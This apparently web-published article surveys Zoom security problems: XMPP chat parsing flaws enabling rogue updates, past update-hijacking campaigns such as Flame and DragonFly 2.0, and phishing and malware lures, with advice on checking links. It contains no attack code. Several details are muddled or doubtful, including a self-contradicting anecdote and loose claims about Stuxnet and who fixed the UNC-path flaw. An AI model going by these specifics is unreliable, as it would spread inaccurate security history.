This week, the University of Chicago and Zoom have teamed up to increase security and make changes to default settings. The university’s information technology department is holding training sessions for instructors, and Zoom has updated its guidelines for locking down meetings. Many users say that they never expected Zoom to be hacked. In fact, one of the University’s information technology officers, Dr. Santina Wheat, was on a Zoom call last week. Despite her concern, Dr. Wheat said she had never thought about the service being hacked.
Exploiting Zoom’s chat functionality:
A recent study has uncovered a number of vulnerabilities in Zoom, including several in the chat functionality. These vulnerabilities affect XMPP messages (Extensible Messaging and Presence Protocol) and could allow an attacker to compromise a client masquerading as a Zoom user and download a rogue update. Once successful, the attacker would be able to execute arbitrary code on the targeted computer. These vulnerabilities are the result of parsing inconsistencies between Zoom’s chat client and server, a problem which can be weaponized to compromise software update mechanisms.
This vulnerability is especially harmful for businesses, where a single malicious member can take control of an entire Zoom meeting. An unwelcome member could then record and gather information from the meeting. This could lead to a case of corporate espionage, or even blackmail. While Zoom has worked to patch this problem, users are still prone to being hacked by malicious software. As a result, these attacks have become quite common.
Attempting to hijack the software update mechanism:
Attackers have attempted to take over trusted software update mechanisms in recent years. Two major examples involve cyberespionage malware known as Flame and Stuxnet. Both of these malicious software programs exploit a vulnerability in Windows Update file checking to infect computers. Flame was detected in 2012, and was signed by unauthorized Microsoft certificates. This means that the attackers didn’t actually compromise Microsoft’s update server, but instead redirected the software update tool to a malicious server.
While updating software is widely regarded as a best practice, state actors have a long history of attacking the software supply chain. In the DragonFly 2.0 case, attackers were able to hijack software updates by impersonating trusted third-party vendors. These attacks have a long-term pattern, and they have become a sophisticated distribution vector. The policy community should work closely with the software industry to address the problem and protect users.
Sending malware to users:
Security experts have warned that hackers are sending malicious messages via Zoom. The attackers are using spoofed emails and phishing sites to gain access to users’ accounts. Users should be vigilant when clicking on any links in their emails asking them to provide their login credentials. Before clicking any link in an email that seems to be from Zoom, double-check the sender’s email address and the URL attached to it. Do not click on any link in an email claiming to be from Zoom – instead, type the official URL into your web browser.
The hackers use the Zoom video platform to spread malware and spyware to unsuspecting users. The vulnerability was discovered after hackers created fake apps and used them to trick users into downloading malware to their computers. The hacker used a vulnerability to insert a UNC path to a remote executable file that would then prompt the user to approve its installation. This vulnerability was fixed as soon as Google Project Zero discovered the problem. Despite this, users should remain vigilant and use the most up-to-date antivirus software to detect malware and spyware.